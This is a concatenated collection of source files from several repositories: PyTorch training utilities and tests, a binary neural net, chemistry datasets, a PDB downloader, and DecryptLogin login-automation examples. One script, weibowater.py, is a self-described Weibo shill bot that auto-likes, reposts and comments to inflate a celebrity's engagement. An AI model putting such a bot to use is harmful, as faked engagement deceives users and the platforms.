self.joint_transform = joint_transform
# internal
split_to_seed = dict(train=0, test=1, validate=2)
self.master_seed = split_to_seed[self.split]*self.size
def __getitem__(self, index):
# generate the labels
label = skimage.data.binary_blobs(
length=self.length,
blob_size_fraction=self.blob_size_fraction,
n_dim=self.n_dim,
volume_fraction=self.volume_fraction,
seed=self.master_seed + index)
# make the raw image [-1,1]
image = label.astype('float32')*2
image -= 1
# add uniform noise
low, high = self.uniform_noise_range
uniform_noise = numpy.random.uniform(low=low, high=high,
size=image.size)
image += uniform_noise.reshape(image.shape)
# add gaussian noise
gaussian_noise = numpy.random.normal(scale=self.gaussian_noise_sigma,
size=image.size)
image += gaussian_noise.reshape(image.shape)
# generate noise at lower scales
small_shape = [s//self.noise_scale_factor for s in label.shape]
small_size = reduce(mul, small_shape, 1)
small_noise_img = numpy.random.uniform(low=low, high=high,
size=small_size)
small_noise_img = small_noise_img.reshape(small_shape)
gaussian_noise = numpy.random.normal(scale=self.gaussian_noise_sigma,
size=small_size)
small_noise_img += gaussian_noise.reshape(small_shape)
noise_img = skimage.transform.resize(image = small_noise_img,
output_shape=image.shape, mode='reflect')
image += noise_img
image -= image.mean()
image /= image.std()
label = label.astype('long')
try:
# Apply transforms
if self.image_transform is not None:
image = self.image_transform(image)
if self.label_transform is not None:
label = self.label_transform(label)
if self.joint_transform is not None:
image, label = self.joint_transform(image, label)
except Exception:
print("[!] An Exception occurred while applying the transforms at "
"index {} of split '{}'.".format(index, self.split))
raise
image = image[None,...]
return image, label
def __len__(self):
return self.size
def get_binary_blob_loaders(train_batch_size=1, test_batch_size=1,
num_workers=1,
train_image_transform=None,
train_label_transform=None,
train_joint_transform=None,
validate_image_transform=None,
validate_label_transform=None,
validate_joint_transform=None,
test_image_transform=None,
test_label_transform=None,
test_joint_transform=None,
**kwargs):
trainset = BinaryBlobs(split='train', image_transform=train_image_transform,
label_transform=train_label_transform, joint_transform=train_joint_transform, **kwargs)
testset = BinaryBlobs(split='test', image_transform=test_image_transform,
label_transform=test_label_transform, joint_transform=test_joint_transform, **kwargs)
validset = BinaryBlobs(split='validate',image_transform=validate_image_transform,
label_transform=validate_label_transform, joint_transform=validate_joint_transform, **kwargs)
trainloader = data.DataLoader(trainset, batch_size=train_batch_size,
num_workers=num_workers)
testloader = data.DataLoader(testset, batch_size=test_batch_size,
num_workers=num_workers)
validloader = data.DataLoader(validset, batch_size=test_batch_size,
num_workers=num_workers)
return trainloader, testloader, validloader
if __name__ == "__main__":
ds = BinaryBlobs()
ds[0]
```
#### File: trainers/callbacks/gradients.py
```python
from ...utils.train_utils import Frequency
from ...utils.exceptions import assert_, FrequencyValueError
from .base import Callback
class LogOutputGradients(Callback):
"""Logs the gradient of the network output"""
def __init__(self, frequency):
super(LogOutputGradients, self).__init__()
self.log_every = frequency
self.registered = False
self.hook_handle = None
@property
def log_every(self):
return self._log_every
@log_every.setter
def log_every(self, value):
self._log_every = Frequency(value, 'iterations')
assert_(self.log_every.is_consistent,
"Log frequency is not consistent.",
FrequencyValueError)
def hook(self, module, grad_input, grad_output):
        # remove the hook if the trainer no longer exists
if self.trainer is None:
self.hook_handle.remove()
return
if self.log_every.match(iteration_count=self.trainer.iteration_count,
epoch_count=self.trainer.epoch_count,
persistent=True, match_zero=True):
self.trainer.update_state('output_gradient', grad_output[0].detach().float().clone().cpu())
def add_hook(self):
self.hook_handle = self.trainer.model.register_backward_hook(self.hook)
def begin_of_fit(self, **kwargs):
self._trainer.logger.observe_state("output_gradient",
observe_while='training')
self.add_hook()
def begin_of_save(self, **_):
# remove hook from model, because you can't pickle it.
if self.hook_handle is not None:
self.hook_handle.remove()
self.hook_handle = None
def end_of_save(self, **_):
# add hook after model save
self.add_hook()
```
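`LogOutputGradients` registers a backward hook on the model and, every `frequency` iterations, pushes the gradient of the network output into the trainer state where a bound logger can pick it up. A wiring sketch; the `register_callback` call and the toy model are assumptions about the surrounding inferno setup, not part of this file:
```python
import torch.nn as nn
from inferno.trainers import Trainer
from inferno.trainers.callbacks.gradients import LogOutputGradients
model = nn.Sequential(nn.Linear(16, 32), nn.ReLU(), nn.Linear(32, 10))
trainer = (Trainer(model)
           .build_criterion('CrossEntropyLoss')
           .build_optimizer('Adam'))
# store the output gradient in the trainer state every 10 iterations
trainer.register_callback(LogOutputGradients(frequency=10))
```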
#### File: callbacks/logging/base.py
```python
import os
from ..base import Callback
class Logger(Callback):
"""
A special callback for logging.
Loggers are special because they're required to be serializable, whereas other
    callbacks have no such guarantees. In this regard, they are jointly handled by
    trainers and the callback engine.
"""
def __init__(self, log_directory=None):
super(Logger, self).__init__()
self._log_directory = None
if log_directory is not None:
self.set_log_directory(log_directory)
@property
def log_directory(self):
if self._log_directory is not None:
return self._log_directory
elif self.trainer is not None and self.trainer._log_directory is not None:
return self.trainer._log_directory
else:
raise RuntimeError("No log directory found.")
@log_directory.setter
def log_directory(self, value):
self.set_log_directory(value)
def set_log_directory(self, log_directory):
assert isinstance(log_directory, str)
if not os.path.isdir(log_directory):
assert not os.path.exists(log_directory)
os.makedirs(log_directory)
self._log_directory = log_directory
return self
```
#### File: callbacks/logging/__init__.py
```python
__all__ = ['get_logger']
try:
INFERNO_WITH_TENSORBOARD_LOGGER = True
from .tensorboard import TensorboardLogger
__all__.append('TensorboardLogger')
except ImportError:
INFERNO_WITH_TENSORBOARD_LOGGER = False
def get_logger(name):
if name in globals():
return globals().get(name)
else:
raise NotImplementedError("Logger not found.")
```
#### File: trainers/callbacks/tqdmstub.py
```python
from .base import Callback
class TQDMProgressBar(Callback):
def __init__(self, *args, **kwargs):
super(TQDMProgressBar, self).__init__(*args, **kwargs)
def bind_trainer(self, *args, **kwargs):
super(TQDMProgressBar, self).bind_trainer(*args, **kwargs)
self.trainer.console.warning("tqdm is not installed. will fall back to normal stdout console.")
def begin_of_fit(self, **_):
pass
```
#### File: test_extensions/test_layers/test_device.py
```python
import unittest
from inferno.extensions.layers.device import DeviceTransfer, OnDevice
import torch
class TransferTest(unittest.TestCase):
@unittest.skipIf(not torch.cuda.is_available(), "GPU not available.")
def test_device_transfer(self):
if not torch.cuda.is_available():
return
# Build transfer model
transfer = DeviceTransfer('cpu')
        x = torch.rand(10, 10, device='cuda', requires_grad=True)
y = transfer(x)
loss = y.mean()
loss.backward()
self.assertFalse(y.data.is_cuda)
self.assertIsNotNone(x.grad)
self.assertTrue(x.grad.data.is_cuda)
@unittest.skipIf(not torch.cuda.is_available(), "GPU not available.")
def test_on_device(self):
if not torch.cuda.is_available():
return
        # Build the input tensor on the CPU
x = torch.rand(1, 10)
# Build model over multiple devices
multi_device_model = torch.nn.Sequential(OnDevice(torch.nn.Linear(10, 10), 'cuda'),
OnDevice(torch.nn.Linear(10, 10), 'cpu'))
y = multi_device_model(x)
self.assertIsInstance(y.data, torch.FloatTensor)
if __name__ == '__main__':
unittest.main()
```
#### File: test_callbacks/test_logging/test_tensorboard.py
```python
import unittest
import os
from shutil import rmtree
import numpy as np
import torch
import torch.nn as nn
from inferno.trainers.basic import Trainer
from torch.utils.data.dataset import TensorDataset
from torch.utils.data.dataloader import DataLoader
from inferno.trainers.callbacks.logging.tensorboard import TensorboardLogger
from inferno.extensions.layers.reshape import AsMatrix
class TestTensorboard(unittest.TestCase):
ROOT_DIR = os.path.dirname(__file__)
PRECISION = 'float'
SAVE_DIRECTORY = os.path.join(ROOT_DIR, 'saves')
LOG_DIRECTORY = os.path.join(ROOT_DIR, 'logs')
@staticmethod
def _make_test_model(input_channels):
toy_net = nn.Sequential(nn.Conv2d(input_channels, 8, 3, 1, 1),
nn.ELU(),
nn.MaxPool2d(2),
nn.Conv2d(8, 8, 3, 1, 1),
nn.ELU(),
nn.MaxPool2d(2),
nn.Conv2d(8, 16, 3, 1, 1),
nn.ELU(),
nn.AdaptiveMaxPool2d((1, 1)),
AsMatrix(),
nn.Linear(16, 10))
return toy_net
def tearDown(self):
for d in [self.SAVE_DIRECTORY, self.LOG_DIRECTORY]:
try:
rmtree(d)
except OSError:
pass
def get_random_dataloaders(self, input_channels=3):
# Convert build random tensor dataset
data_shape = (1, input_channels, 64, 64)
target_shape = (1)
random_array = torch.from_numpy(np.random.rand(*data_shape)).float()
target_array = torch.from_numpy(np.random.randint(0, 9, size=target_shape))
train_dataset = TensorDataset(random_array, target_array)
test_dataset = TensorDataset(random_array, target_array)
# Build dataloaders from dataset
train_loader = DataLoader(train_dataset, batch_size=1,
shuffle=True, num_workers=0, pin_memory=False)
test_loader = DataLoader(test_dataset, batch_size=1,
shuffle=True, num_workers=0, pin_memory=False)
return train_loader, test_loader
def get_trainer(self, input_channels):
# Build model
net = self._make_test_model(input_channels)
# Build trainer
trainer = Trainer(net)\
.build_logger(TensorboardLogger(send_image_at_batch_indices=0,
send_image_at_channel_indices='all',
log_images_every=(20, 'iterations')),
log_directory=self.LOG_DIRECTORY)\
.build_criterion('CrossEntropyLoss')\
.build_metric('CategoricalError')\
.build_optimizer('Adam')\
.validate_every((1, 'epochs'))\
.save_every((2, 'epochs'), to_directory=self.SAVE_DIRECTORY)\
.save_at_best_validation_score()\
.set_max_num_epochs(2)\
.set_precision(self.PRECISION)
# Bind loaders
train_loader, test_loader = self.get_random_dataloaders(input_channels=input_channels)
trainer.bind_loader('train', train_loader).bind_loader('validate', test_loader)
return trainer
def test_tensorboard(self):
trainer = self.get_trainer(3)
trainer.fit()
def test_tensorboard_grayscale(self):
trainer = self.get_trainer(1)
trainer.fit()
def test_serialization(self):
trainer = self.get_trainer(3)
# Serialize
trainer.save()
# Unserialize
trainer = Trainer().load(os.path.join(self.ROOT_DIR, 'saves'))
train_loader, test_loader = self.get_random_dataloaders(input_channels=3)
trainer.bind_loader('train', train_loader).bind_loader('validate', test_loader)
trainer.fit()
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "0h-n0/linensend",
"score": 3
} |
#### File: 0h-n0/linensend/linesend.py
```python
import requests
def line_notify(line_token, message):
endpoint = 'https://notify-api.line.me/api/notify'
message = "\n{}".format(message)
payload = {'message': message}
headers = {'Authorization': 'Bearer {}'.format(line_token)}
requests.post(endpoint, data=payload, headers=headers)
print(f"Send your message: {message}")
def get_args():
import argparse
    description = ('send a message from command line to LINE service.'
                   ' Before sending a message, you have to create your'
                   ' access token via https://notify-bot.line.me/my/.')
parser = argparse.ArgumentParser(description=description)
parser.add_argument('-t', '--token',
action='store',
nargs='?',
const=None,
required=True,
type=str,
choices=None,
help=('set your LINE token.'),
metavar=None)
parser.add_argument('-m', '--message',
action='store',
nargs='?',
const=None,
required=True,
type=str,
choices=None,
help=('set your message.'),
metavar=None)
return parser.parse_args()
def commandline():
args = get_args()
line_notify(args.token, args.message)
``` |
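Besides the `commandline` entry point, `line_notify` can be called directly from other scripts; the token below is a placeholder for a LINE Notify access token issued at https://notify-bot.line.me/my/.
```python
from linesend import line_notify
# '<your-line-notify-token>' is a placeholder, not a real token.
line_notify('<your-line-notify-token>', 'training finished')
```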
{
"source": "0h-n0/NeuralNetworkPhys",
"score": 3
} |
#### File: 0h-n0/NeuralNetworkPhys/binary_net.py
```python
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
import torch.nn.functional as F
from torchvision import datasets, transforms
class BinaryLinear(nn.Module):
def __init__(self, in_size, out_size):
super(BinaryLinear, self).__init__()
self.in_size = in_size
self.out_size = out_size
self.fc = nn.Linear(in_size, out_size)
self.init_weights()
self.set_hook()
def init_weights(self):
def _init_weights(m):
if type(m) == nn.Linear:
                binary_w = np.random.choice([-1, 1],
                                            size=(self.out_size,
                                                  self.in_size))
                binary_b = np.random.choice([-1, 1],
                                            size=(self.out_size,))
binary_w = binary_w.astype(np.float32)
binary_b = binary_b.astype(np.float32)
m.weight.data = torch.FloatTensor(binary_w)
m.bias.data = torch.FloatTensor(binary_b)
self.apply(_init_weights)
def set_hook(self):
def binarize(m, inputs):
w = m.fc.weight.data.numpy()
w = np.where(w > 0, 1, -1)
b = m.fc.bias.data.numpy()
b = np.where(b > 0, 1, -1)
m.fc.weight.data = \
torch.FloatTensor(w.astype(np.float32))
m.fc.bias.data = \
torch.FloatTensor(b.astype(np.float32))
self.register_forward_pre_hook(binarize)
def forward(self, x):
return self.fc(x)
class BinaryNet(nn.Module):
def __init__(self):
super(BinaryNet, self).__init__()
self.fc1 = BinaryLinear(784, 200)
self.fc2 = BinaryLinear(200, 50)
self.fc3 = BinaryLinear(50, 10)
def forward(self, x):
x = x.view(-1, 784)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return F.softmax(x)
lr = 0.01
momentum = 0.9
batch_size = 10
epochs = 10
cuda = None
kwargs = {'num_workers': 1, 'pin_memory': True} if cuda else {}
train_loader = torch.utils.data.DataLoader(
datasets.MNIST('../data', train=True, download=True,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])),
batch_size=batch_size, shuffle=True, **kwargs)
test_loader = torch.utils.data.DataLoader(
datasets.MNIST('../data', train=False, transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])),
batch_size=batch_size, shuffle=True, **kwargs)
model = BinaryNet()
optimizer = optim.SGD(model.parameters(),
lr=lr, momentum=momentum)
loss_fn = torch.nn.CrossEntropyLoss(size_average=False)
def train(epoch):
model.train()
for batch_idx, (data, target) in enumerate(train_loader):
if cuda:
data, target = data.cuda(), target.cuda()
data, target = Variable(data), Variable(target)
optimizer.zero_grad()
output = model(data)
loss = loss_fn(output, target)
loss.backward()
optimizer.step()
if batch_idx % 100 == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.data[0]))
for epoch in range(1, epochs + 1):
train(epoch)
``` |
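The script above only trains; a matching evaluation pass over `test_loader`, written as a sketch in the same pre-0.4 PyTorch style and against the same globals (`model`, `loss_fn`, `cuda`), could look like this:
```python
def test():
    model.eval()
    test_loss, correct = 0.0, 0
    for data, target in test_loader:
        if cuda:
            data, target = data.cuda(), target.cuda()
        data, target = Variable(data, volatile=True), Variable(target)
        output = model(data)
        test_loss += loss_fn(output, target).data[0]
        pred = output.data.max(1)[1]
        correct += pred.eq(target.data).sum()
    test_loss /= len(test_loader.dataset)
    print('Test loss: {:.4f}, accuracy: {}/{}'.format(
        test_loss, correct, len(test_loader.dataset)))
```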
{
"source": "0h-n0/pybiodata",
"score": 2
} |
#### File: pybiodata/pybiodata/pdb.py
```python
import requests
from .base import AbstractDatabase
from .database_urls import PDB_REST_URL, PDB_DOWNLOAD_URL
class PDB(AbstractDatabase):
def __init__(self, parser):
self.args = vars(parser.parse_args())
def run(self):
pdb_id = self.args['id']
filename = f'{pdb_id}.pdb'
with requests.get(PDB_DOWNLOAD_URL + f'/{filename}', stream=True) as r:
r.raise_for_status()
with open(filename, 'wb') as f:
for chunk in r.iter_content(chunk_size=8192):
if chunk:
f.write(chunk)
return filename
@classmethod
def set_command_arguments(cls):
parser = super().set_command_arguments()
parser.add_argument('--id', help='set PDBID')
return parser
``` |
{
"source": "0h-n0/pytorch_chemistry",
"score": 2
} |
#### File: torch_chemistry/datasets/base_dataset.py
```python
from torch.utils.data import Dataset
import rdkit
from torch_geometric.data import InMemoryDataset
class InMemoryRdkitDataset(InMemoryDataset):
edge_types = {rdkit.Chem.rdchem.BondType.SINGLE: 0,
rdkit.Chem.rdchem.BondType.DOUBLE: 1,
rdkit.Chem.rdchem.BondType.TRIPLE: 2,
rdkit.Chem.rdchem.BondType.AROMATIC: 3}
def __init__(self, root, tranform=None, pre_transform=None, pre_filter=None):
super(InMemoryRdkitDataset, self).__init__(root, tranform, pre_transform, pre_filter)
def __str__(self):
        return self.__class__.__name__
```
#### File: nn/conv/sg_conv.py
```python
import torch
from torch.nn import Parameter
from . import GNNConv
from ..init import uniform
class SGCConv(GNNConv):
def __init__(self, in_channels, out_channels,
bias=True, **kwargs):
pass
```
#### File: nn/metrics/metric.py
```python
import torch.nn as nn
from ..functional.metric import *
class ROCCurve(nn.Module):
def __init__(self):
super(ROCCurve, self).__init__()
def forward(self, pred, target):
return roc_curve(pred, target)
class ROCAUCScore(nn.Module):
def __init__(self):
super(ROCAUCScore, self).__init__()
def forward(self, pred, target):
return roc_auc_score(pred, target)
class AUC(nn.Module):
def __init__(self):
super(AUC, self).__init__()
def forward(self, fpr, tpr):
return auc(fpr, tpr)
``` |
{
"source": "0h-n0/sequential_graph_generation",
"score": 3
} |
#### File: sequential_graph_generation/models/basic.py
```python
import math
import torch
import torch.nn as nn
import torch.distributions as dists
import torch.nn.functional as F
import torch.nn.utils.rnn as rnn_utils
def init_feedforward_weights(dnn: nn.Module,
init_mean=0,
init_std=1,
init_xavier: bool=True,
init_normal: bool=True,
init_gain: float=1.0):
for name, p in dnn.named_parameters():
if 'bias' in name:
p.data.zero_()
if 'weight' in name:
if init_xavier:
if init_normal:
nn.init.xavier_normal(p.data, init_gain)
else:
nn.init.xavier_uniform(p.data, init_gain)
else:
if init_normal:
nn.init.normal(p.data, init_gain)
else:
nn.init.uniform(p.data, init_gain)
class GraphLinear(torch.nn.Module):
"""Graph Linear layer.
This function assumes its input is 3-dimensional.
Differently from :class:`chainer.functions.linear`, it applies an affine
transformation to the third axis of input `x`.
.. seealso:: :class:`torch.nn.Linear`
"""
def __init__(self,
in_features,
out_features,
*,
nonlinearity='sigmoid',
init_mean=0,
init_std=1,
init_xavier: bool=True,
init_normal: bool=True,
init_gain = None,
dropout=0.0,
bias=True,
):
super(GraphLinear, self).__init__()
self.linear = torch.nn.Linear(in_features,
out_features,
bias)
self.out_features = out_features
self.nonlinearity = nonlinearity
        if init_gain is None:
            if nonlinearity is not None:
                init_gain = torch.nn.init.calculate_gain(nonlinearity)
            else:
                init_gain = 1
init_feedforward_weights(self.linear,
init_mean,
init_std,
init_xavier,
init_normal,
init_gain)
def __call__(self, x):
# (minibatch, atom, ch)
s0, s1, s2 = x.size()
x = x.view(s0 * s1, s2)
x = self.linear(x)
x = x.view(s0, s1, self.out_features)
return x
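# Usage sketch (shapes assumed from the docstring): the same affine map is applied to the
# last axis of a 3-D (minibatch, atom, channel) tensor.
#   layer = GraphLinear(in_features=8, out_features=16)
#   x = torch.randn(4, 10, 8)   # (minibatch=4, atoms=10, channels=8)
#   y = layer(x)                # -> shape (4, 10, 16)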
``` |
{
"source": "0honus0/DecryptLogin",
"score": 2
} |
#### File: DecryptLogin/DecryptLogin/login.py
```python
import warnings
from .modules import *
warnings.filterwarnings('ignore')
'''Simulated-login class: directly returns a logged-in session'''
class Login():
def __init__(self, disable_print_auth=False, **kwargs):
if not disable_print_auth: print(self)
self.supported_apis = {
'douban': douban().login, 'weibo': weibo().login, 'github': github().login, 'music163': music163().login,
'zt12306': zt12306().login, 'QQZone': QQZone().login, 'QQQun': QQQun().login, 'QQId': QQId().login,
'zhihu': zhihu().login, 'bilibili': bilibili().login, 'toutiao': toutiao().login, 'taobao': taobao().login,
'jingdong': jingdong().login, 'ifeng': ifeng().login, 'sohu': sohu().login, 'zgconline': zgconline().login,
'lagou': lagou().login, 'twitter': twitter().login, 'eSurfing': eSurfing().login, 'tencentvideo': tencentvideo().login,
'renren': renren().login, 'w3cschool': w3cschool().login, 'fishc': fishc().login, 'youdao': youdao().login,
'baidupan': baidupan().login, 'stackoverflow': stackoverflow().login, 'codalab': codalab().login, 'pypi': pypi().login,
'douyu': douyu().login, 'migu': migu().login, 'qunar': qunar().login, 'mieshop': mieshop().login, 'mpweixin': mpweixin().login,
'baidutieba': baidutieba().login, 'dazhongdianping': dazhongdianping().login, 'jianguoyun': jianguoyun().login,
'cloud189': cloud189().login, 'qqmusic': qqmusic().login, 'ximalaya': ximalaya().login, 'icourse163': icourse163().login,
'xiaomihealth': xiaomihealth().login,
}
for key, value in self.supported_apis.items():
setattr(self, key, value)
'''str'''
def __str__(self):
return 'Welcome to use DecryptLogin!\nYou can visit https://github.com/CharlesPikachu/DecryptLogin for more details.'
'''Return the client class for the corresponding website'''
class Client():
def __init__(self, disable_print_auth=False, **kwargs):
if not disable_print_auth: print(self)
self.supported_clients = {
'bilibili': BiliBiliClient, 'weibo': WeiboClient, 'douban': DoubanClient, 'github': GithubClient,
'music163': Music163Client, 'zt12306': Zt12306Client, 'QQZone': QQZoneClient, 'QQId': QQIdClient,
'QQQun': QQQunClient, 'zhihu': ZhihuClient, 'taobao': TaobaoClient, 'toutiao': ToutiaoClient,
'jingdong': JingdongClient, 'ifeng': IfengClient, 'sohu': SohuClient, 'zgconline': ZgconlineClient,
'twitter': TwitterClient, 'renren': RenRenClient, 'lagou': LagouClient, 'eSurfing': eSurfingClient,
'w3cschool': W3CSchoolClient, 'fishc': FishCClient, 'youdao': YoudaoClient, 'stackoverflow': StackoverflowClient,
'baidupan': BaiduPanClient, 'douyu': DouyuClient, 'codalab': CodaLabClient, 'pypi': PyPiClient,
'migu': MiguClient, 'qunar': QunarClient, 'xiaomihealth': XiaomiHealthClient, 'mieshop': MieShopClient,
'mpweixin': MpweixinClient, 'baidutieba': BaiduTiebaClient, 'dazhongdianping': DazhongdianpingClient, 'jianguoyun': JianguoyunClient,
'cloud189': Cloud189Client, 'qqmusic': QQMusicClient, 'ximalaya': XimalayaClient, 'icourse163': Icourse163Client,
'tencentvideo': TencentVideoClient,
}
for key, value in self.supported_clients.items():
setattr(self, key, value)
'''str'''
def __str__(self):
return 'Welcome to use DecryptLogin!\nYou can visit https://github.com/CharlesPikachu/DecryptLogin for more details.'
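# Hedged usage sketch, mirroring the bundled example scripts further below
# (attribute names come from supported_apis / supported_clients above; username/password are placeholders):
#   client = Client()
#   bili = client.bilibili(reload_history=True)
#   infos_return, session = bili.login(username, password, 'scanqr')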
```
#### File: examples/bilibililottery/bilibililottery.py
```python
import re
import time
import random
import argparse
from tqdm import tqdm
from DecryptLogin import login
'''Parse command-line arguments'''
def parseArgs():
parser = argparse.ArgumentParser(description='B站监控关注的UP主并自动转发抽奖')
parser.add_argument('--username', dest='username', help='用于存储历史cookies的唯一标识ID', type=str, required=False)
parser.add_argument('--interval', dest='interval', help='查询UP主的动态的间隔时间', type=int, default=1800, required=False)
args = parser.parse_args()
return args
'''Monitor followed Bilibili uploaders and automatically repost lottery posts'''
class BiliBiliLottery():
def __init__(self, username='charlespikachu', time_interval=1800, **kwargs):
self.username = username
self.time_interval = time_interval
self.comments = ['日常当分母', '就想简简单单中个奖QAQ', '啊啊啊啊啊, 让我中一次吧 T_T', '天选之子']
self.headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36',
}
    '''Run'''
def run(self):
        # Simulated login
client = login.Client()
bili = client.bilibili(reload_history=True)
infos_return, session = bili.login(self.username, '微信公众号: Charles的皮卡丘', 'scanqr')
# 获得关注列表
self.logging('正在获取您的关注列表')
followings_ids = self.getfollowings(session, infos_return)
# 获得UP主当前的动态
self.logging('正在获取您的关注列表里的UP主的所有动态')
followings_infos = {}
for userid in followings_ids:
followings_infos[userid] = self.getupdates(infos_return, userid, session)
# 监控新的动态
self.logging('开始监控是否有新的抽奖信息发布')
while True:
time.sleep(self.time_interval)
self.logging('开始检测是否有新的抽奖信息发布')
for userid in tqdm(followings_ids):
updates_old = followings_infos.pop(userid)
updates_latest = self.getupdates(infos_return, userid, session)
for dynamic_id in updates_latest.keys():
if dynamic_id not in updates_old:
desp = updates_latest[dynamic_id]
if '#互动抽取#' in desp:
result = self.forwardupdate(session, infos_return, dynamic_id)
self.logging(f'检测到有新的抽奖信息发布, 已经尝试转发, 返回的结果为{result}')
followings_infos[userid] = updates_latest
'''logging'''
def logging(self, msg, tip='INFO'):
print(f'[{time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())} {tip}]: {msg}')
    '''Repost a post (dynamic)'''
def forwardupdate(self, session, infos_return, dynamic_id):
url = 'http://api.vc.bilibili.com/dynamic_repost/v1/dynamic_repost/repost'
data = {
'uid': infos_return['data']['mid'],
'dynamic_id': dynamic_id,
'content' : random.choice(self.comments),
'ctrl': '[{"data":"5581898","location":2,"length":4,"type":1},{"data":"10462362","location":7,"length":5,"type":1},{"data":"1577804","location":13,"length":4,"type":1}]',
'csrf_token': session.cookies.get('bili_jct')
}
response = session.post(url, data=data, headers=self.headers)
return response.json()
    '''Get an uploader's posts (dynamics)'''
def getupdates(self, infos_return, host_uid, session):
url = f'https://api.vc.bilibili.com/dynamic_svr/v1/dynamic_svr/space_history?visitor_uid={infos_return["data"]["mid"]}&host_uid={host_uid}&offset_dynamic_id=0&need_top=1&platform=web'
response = session.get(url, headers=self.headers)
response_json, updates = response.json(), {}
for card in response_json['data']['cards']:
dynamic_id = card['desc']['dynamic_id']
try:
desp = re.findall(r'"description":"(.*?)"', card['card'])[0]
except:
desp = ''
updates[dynamic_id] = desp
return updates
    '''Get the list of followed accounts'''
def getfollowings(self, session, infos_return):
url = 'https://api.bilibili.com/x/relation/followings'
params = {
'vmid': infos_return['data']['mid'],
'pn': '1',
'ps': '20',
'order': 'desc',
'order_type': 'attention',
'jsonp': 'jsonp',
}
response = session.get(url, params=params, headers=self.headers)
total = response.json()['data']['total']
followings_ids, page = [], 1
while True:
for item in response.json()['data']['list']:
followings_ids.append(item['mid'])
if len(followings_ids) >= total: break
page += 1
params['pn'] = str(page)
response = session.get(url, params=params, headers=self.headers)
return followings_ids
'''run'''
if __name__ == '__main__':
args = parseArgs()
client = BiliBiliLottery(username=args.username, time_interval=args.interval)
client.run()
```
#### File: examples/weibowater/weibowater.py
```python
import re
import time
import random
import argparse
from DecryptLogin import login
'''Parse command-line arguments'''
def parseArgs():
parser = argparse.ArgumentParser(description='一个简单的微博水军机器人')
parser.add_argument('--username', dest='username', help='微博登录用的账户名', type=str, required=False)
parser.add_argument('--password', dest='password', help='微博登录用的密码', type=str, required=False)
parser.add_argument('--targetid', dest='targetid', help='想要流量造假服务的明星微博ID, 例如: 1776448504', type=str, required=True)
args = parser.parse_args()
return args
'''A simple Weibo shill (astroturfing) bot'''
class WeiboWater():
def __init__(self, username='charlespikachu', password='微信公众号: <PASSWORD>', targetid=None, **kwargs):
self.username = username
self.password = password
self.targetid = targetid
self.comments = ['转发微博', '太赞了', '真棒', '挺好的', '宣传一下']
self.headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36',
}
    '''Run'''
def run(self):
        # Simulated login
client = login.Client()
weibo = client.weibo(reload_history=True)
infos_return, session = weibo.login(self.username, self.password, 'mobile')
        # Get the target user's most recently published Weibo post
url = f'https://m.weibo.cn/u/{self.targetid}?uid={self.targetid}&luicode=10000011&lfid=231093_-_selffollowed'
session.get(url, headers=self.headers)
containerid = re.findall(r'fid%3D(\d+)%26', str(session.cookies))[0]
url = f'https://m.weibo.cn/api/container/getIndex?type=uid&value={self.targetid}&containerid={containerid}'
response = session.get(url, headers=self.headers)
for item in response.json()['data']['tabsInfo']['tabs']:
if item['tab_type'] == 'weibo': containerid = item['containerid']
url = f'https://m.weibo.cn/api/container/getIndex?type=uid&value={self.targetid}&containerid={containerid}'
response = session.get(url, headers=self.headers)
cards = response.json()['data']['cards']
for card in cards:
if card['card_type'] == 9:
self.logging(f'选择的用户微博为 >>>\n{card}')
break
selected_card = card
        # Auto-like
card_id = selected_card['mblog']['id']
response = session.get('https://m.weibo.cn/api/config')
st = response.json()['data']['st']
flag, response_json = self.starweibo(session, st, card_id)
if flag:
self.logging(f'自动点赞ID为{card_id}的微博成功')
else:
self.logging(f'自动点赞ID为{card_id}的微博失败, 返回的内容为 >>>\n{response_json}')
        # Auto-repost + comment
flag, response_json = self.repost(session, st, card_id)
if flag:
self.logging(f'自动转发+评论ID为{card_id}的微博成功')
else:
self.logging(f'自动转发+评论ID为{card_id}的微博失败, 返回的内容为 >>>\n{response_json}')
    '''Auto-repost + comment'''
def repost(self, session, st, card_id):
url = 'https://m.weibo.cn/api/statuses/repost'
data = {
'id': card_id,
'content': random.choice(self.comments),
'dualPost': 1,
'mid': card_id,
'st': st,
}
response = session.post(url, data=data)
if 'ok' in response.json() and str(response.json()['ok']) == '1':
return True, response.json()
return False, response.json()
    '''Auto-like'''
def starweibo(self, session, st, card_id):
session.headers.update({
'origin': 'https://m.weibo.cn',
'referer': f'https://m.weibo.cn/u/{self.targetid}?uid={self.targetid}',
})
data = {
'id': card_id,
'attitude': 'heart',
'st': st,
'_spr': 'screen:1536x864',
}
url = 'https://m.weibo.cn/api/attitudes/create'
response = session.post(url, data=data)
if 'ok' in response.json() and str(response.json()['ok']) == '1':
return True, response.json()
return False, response.json()
'''logging'''
def logging(self, msg, tip='INFO'):
print(f'[{time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())} {tip}]: {msg}')
'''run'''
if __name__ == '__main__':
args = parseArgs()
client = WeiboWater(username=args.username, password=<PASSWORD>, targetid=args.targetid)
client.run()
``` |
{
"source": "0hsn/problem-per-day",
"score": 4
} |
#### File: 0hsn/problem-per-day/repeated_string.py
```python
from pprint import pprint
def repeatedString(s, n):
if len(s) == 1:
return n if s == 'a' else 0
if 'a' not in s:
return 0
    rpt = n // len(s) if (n % len(s) == 0) else n // len(s) + 1
ss = s * rpt
ss = ss[:n]
cnt = 0
for c in ss:
if c == 'a': cnt+=1
return cnt
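# Worked example: repeatedString('aba', 10) repeats the string to 'abaabaabaa',
# which contains 7 occurrences of 'a'.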
if __name__ == '__main__':
print(repeatedString('b', 10000000000000000000000))
``` |
{
"source": "0Hughman0/ezlock",
"score": 4
} |
#### File: ezlock/ezlock/lock.py
